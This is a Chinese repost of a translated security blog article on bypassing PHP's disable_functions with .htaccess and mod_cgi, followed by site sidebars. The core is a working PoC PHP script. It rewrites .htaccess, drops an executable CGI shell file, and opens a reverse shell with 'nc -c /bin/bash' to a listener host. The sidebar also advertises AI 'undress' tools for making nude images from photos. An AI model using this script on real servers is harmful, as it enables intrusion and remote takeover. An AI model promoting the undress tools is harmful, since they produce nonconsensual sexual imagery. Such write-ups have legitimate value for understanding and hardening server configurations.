禁用php的system函数以获取shell访问
您可以禁用PHP函数
如果你拥有一个运行着PHP的Web服务器,禁用一些PHP的危险功能可能是一个好主意,其中有些功能也许是你的网站所不需要的 。如果攻击者设法在你的服务器上运行恶意代码,那么限制一些函数提供功能可能会减少攻击所带来的危害。幸运的是,PHP为我们提供了一种简单的方法来做到这一点。你只需要做到对你想要禁用的函数执行disable_functions 功能。然而,在某些情况下,系统命令的执行仍然是有可能的,我会用一个启用了mod_cgi的.htaccess文件作为例子给你解释。
这种方法只适用于一部分的Apache服务器配置,我敢肯定我不是第一个发现这个问题的人。不管怎样,这里列举了3项需要满足的最低要求:
需要启用mod_cgi;
需要允许htaccess文件;
你必须能够写入文件。
背景知识:
什么是mod_cgi?
其中CGI代表通用网关接口。它允许Web服务器与可执行文件进行交互。这意味着你可以用C,Perl或者Python来写Web应用程序。即使全部由shell脚本组成Web应用程序也是可能的。你还可以把PHP作为一个CGI程序来运行,而不是作为一个模块运行。
什么是htaccess文件?
Apache支持所谓的虚拟主机。虚拟主机通常用于在一台机器上运行多个网站或者子域。这些内部文件中,你可以按照自己的喜好更改网站的Web根目录或Apache模块的特定选项中的多种设置。有时候在一个共享的托管环境中,用户被允许按照自己的喜好定制自己的网站,但是他们没有更改同一主机上的其他用户设置的能力。这时候htaccess文件就派上用场了。它是让你改变在每个目录下的很多虚拟主机设置的基础。通常使用htaccess能够更好更快地在虚拟主机文件中直接做到这点,只要你有机会获得它们。
我们如何利用呢?
有了这些知识之后,我们如何才能利用它们拿到系统shell访问权限,即使在PHP中是被禁用的? 首先我们要检查上述所有的要求是否得到了满足。正如我上面所说的,有的时候,事实并非如此。 但是,如果我们足够幸运的话,我们可以尝试一切写入或启用来达到目的。我们试图达到以下目的:
我们希望能够在当前目录下执行CGI脚本。这需要利用一个htaccess文件中的Options +ExecCGI 来完成。 mod_cgi必须能够区分实际的CGI脚本和其它的文件。为此,我们需要指定一些它能识别的扩展。可以是任何你想要的扩展,例如.dizzle。我们使用在 .htaccess 文件中的AddHandler cgi-script .dizzle做到这一点。 现在,我们能够上传以.dizzle后缀结尾的shell脚本,并且利用PHP 的chmod命令('shell.dizzle',0777)使它成为可执行文件。当我们的脚本有输出之后,首先我们必须要设置一个与内容同类型的头部,否则Apache将显示StatusCode 500错误。我们这样做只是为了把echo -ne“Content-Type:text / html\ n \ n”作为我们的shell脚本中的第一输出。之后,你可就以完成几乎所有你可以用普通shell脚本所做到的事情。
只是看这些理论的东西比较无聊,下面是一个PoC攻击实例:
<?php$cmd = "nc -c '/bin/bash' 172.16.15.1 4444"; //command to be executed$shellfile = "#!/bin/bash\n"; //using a shellscript$shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; //header is needed, otherwise a 500 error is thrown when there is output$shellfile .= "$cmd"; //executing $cmdfunction checkEnabled($text,$condition,$yes,$no) //this surely can be shorter{echo "$text: " . ($condition ? $yes : $no) . "<br>\n";}if (!isset($_GET['checked'])){@file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowedheader('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked}else{$modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?$writable = is_writable('.'); //current dir writable?$htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");checkEnabled("Is writable",$writable,"Yes","No");checkEnabled("htaccess working",$htaccess,"Yes","No");if(!($modcgi && $writable && $htaccess)){echo "Error. All of the above must be true for the script to work!"; //abort if not}else{checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extensioncheckEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the filecheckEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwxecho "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;' alt="禁用php的system函数以获取shell访问" >"; //call the script}}?>
本文由 360安全播报 翻译,转载请注明“转自360安全播报”,并附上链接。
原文链接:https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1658
14
1415
52
1309
25
1257
29
1231
24
How does session hijacking work and how can you mitigate it in PHP?
Apr 06, 2025 am 12:02 AM
Session hijacking can be achieved through the following steps: 1. Obtain the session ID, 2. Use the session ID, 3. Keep the session active. The methods to prevent session hijacking in PHP include: 1. Use the session_regenerate_id() function to regenerate the session ID, 2. Store session data through the database, 3. Ensure that all session data is transmitted through HTTPS.
Explain different error types in PHP (Notice, Warning, Fatal Error, Parse Error).
Apr 08, 2025 am 12:03 AM
There are four main error types in PHP: 1.Notice: the slightest, will not interrupt the program, such as accessing undefined variables; 2. Warning: serious than Notice, will not terminate the program, such as containing no files; 3. FatalError: the most serious, will terminate the program, such as calling no function; 4. ParseError: syntax error, will prevent the program from being executed, such as forgetting to add the end tag.
PHP and Python: Comparing Two Popular Programming Languages
Apr 14, 2025 am 12:13 AM
PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.
What are HTTP request methods (GET, POST, PUT, DELETE, etc.) and when should each be used?
Apr 09, 2025 am 12:09 AM
HTTP request methods include GET, POST, PUT and DELETE, which are used to obtain, submit, update and delete resources respectively. 1. The GET method is used to obtain resources and is suitable for read operations. 2. The POST method is used to submit data and is often used to create new resources. 3. The PUT method is used to update resources and is suitable for complete updates. 4. The DELETE method is used to delete resources and is suitable for deletion operations.
Explain secure password hashing in PHP (e.g., password_hash, password_verify). Why not use MD5 or SHA1?
Apr 17, 2025 am 12:06 AM
In PHP, password_hash and password_verify functions should be used to implement secure password hashing, and MD5 or SHA1 should not be used. 1) password_hash generates a hash containing salt values to enhance security. 2) Password_verify verify password and ensure security by comparing hash values. 3) MD5 and SHA1 are vulnerable and lack salt values, and are not suitable for modern password security.
PHP: A Key Language for Web Development
Apr 13, 2025 am 12:08 AM
PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7
Explain Arrow Functions (short closures) introduced in PHP 7.4.
Apr 06, 2025 am 12:01 AM
The arrow function was introduced in PHP7.4 and is a simplified form of short closures. 1) They are defined using the => operator, omitting function and use keywords. 2) The arrow function automatically captures the current scope variable without the use keyword. 3) They are often used in callback functions and short calculations to improve code simplicity and readability.
PHP in Action: Real-World Examples and Applications
Apr 14, 2025 am 12:19 AM
PHP is widely used in e-commerce, content management systems and API development. 1) E-commerce: used for shopping cart function and payment processing. 2) Content management system: used for dynamic content generation and user management. 3) API development: used for RESTful API development and API security. Through performance optimization and best practices, the efficiency and maintainability of PHP applications are improved.
